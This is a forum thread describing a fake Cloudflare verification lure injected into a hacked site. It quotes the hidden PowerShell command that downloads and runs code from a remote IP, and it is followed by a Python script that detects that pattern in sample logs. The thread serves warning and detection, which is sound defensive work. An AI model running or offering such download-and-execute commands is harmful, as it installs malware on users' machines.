Cloudflare spoofing attack

Started by ergophobe, September 24, 2025, 01:23:56 AM


ergophobe

A company my wife works with had their site hacked and the hackers are injecting an iframe hosted on glcouds.icu and it looks like this:

[attachment: screenshot not available]

If you follow the command, it runs this in PowerShell:

powershell -w h -nop -c iex(iwr -Uri 93.152.230.54 -UseBasicParsing)
I did not bother to see what gets downloaded from that IP.

No surprise, it's been around for a while, but I had never seen it.

Here's a Reddit thread from 6 months ago:
https://www.reddit.com/r/CloudFlare/comments/1jog7et/fake_cloudflare_verification_page_almost_fell_for/

It's kind of a genius hack, since more and more Cloudflare verification = "secure", so why not just follow the instructions and paste random code into PowerShell?
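A defender-side triage of the command quoted in the post, added here as an example (not code from the post or anyone in the thread): it scans constructed process-creation log lines for the hidden-window, no-profile, download-and-execute pattern and pulls out the remote target for blocking and hunting. The log format, the sample records and the example.invalid URL are assumptions.

```python
import re

# Constructed sample process-creation records (not from the page), as
# "timestamp|parent_image|command_line". Record 2 mirrors the command
# quoted in the post; the others are benign look-alikes for contrast.
SAMPLE_LOGS = [
    "2025-09-24T01:20:01|explorer.exe|powershell.exe -NoProfile -Command Get-Date",
    "2025-09-24T01:21:10|explorer.exe|powershell -w h -nop -c iex(iwr -Uri 93.152.230.54 -UseBasicParsing)",
    '2025-09-24T01:22:33|explorer.exe|powershell -WindowStyle Hidden -NoProfile -Command "Invoke-Expression (Invoke-WebRequest http://example.invalid/x).Content"',
    "2025-09-24T01:23:05|svchost.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

# Case-insensitive patterns that also accept PowerShell's abbreviated
# parameter names (-w h, -nop) and cmdlet aliases (iex, iwr, irm).
HIDDEN = re.compile(r"(?:^|\s)-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b", re.I)
NOPROFILE = re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I)
CRADLE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*?\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I)
TARGET = re.compile(
    r"(?:https?://)?(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/[^\s)'\"]*)?|https?://[^\s)'\"]+", re.I)


def reasons(cmdline):
    """Return the list of indicators found in one PowerShell command line."""
    found = []
    if HIDDEN.search(cmdline):
        found.append("hidden window")
    if NOPROFILE.search(cmdline):
        found.append("no profile")
    if CRADLE.search(cmdline):
        found.append("download-and-execute cradle")
    return found


def is_clickfix(cmdline):
    """Flag a remote fetch piped straight into Invoke-Expression that is also
    trying to stay out of sight (hidden window and/or no profile)."""
    r = reasons(cmdline)
    return "download-and-execute cradle" in r and len(r) >= 2


def triage(log_lines):
    """Parse records, keep the suspicious ones and extract the remote target
    so it can be blocked and other hosts that fetched it can be hunted."""
    hits = []
    for line in log_lines:
        ts, parent, cmdline = line.split("|", 2)
        if is_clickfix(cmdline):
            m = TARGET.search(cmdline)
            hits.append({"ts": ts, "parent": parent, "reasons": reasons(cmdline),
                         "target": m.group(0) if m else None})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOGS):
        print(hit)
```

The benign first and last records are not flagged because a -NoProfile or -File invocation on its own is routine; only the combination with a download cradle trips the rule.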

rcjordan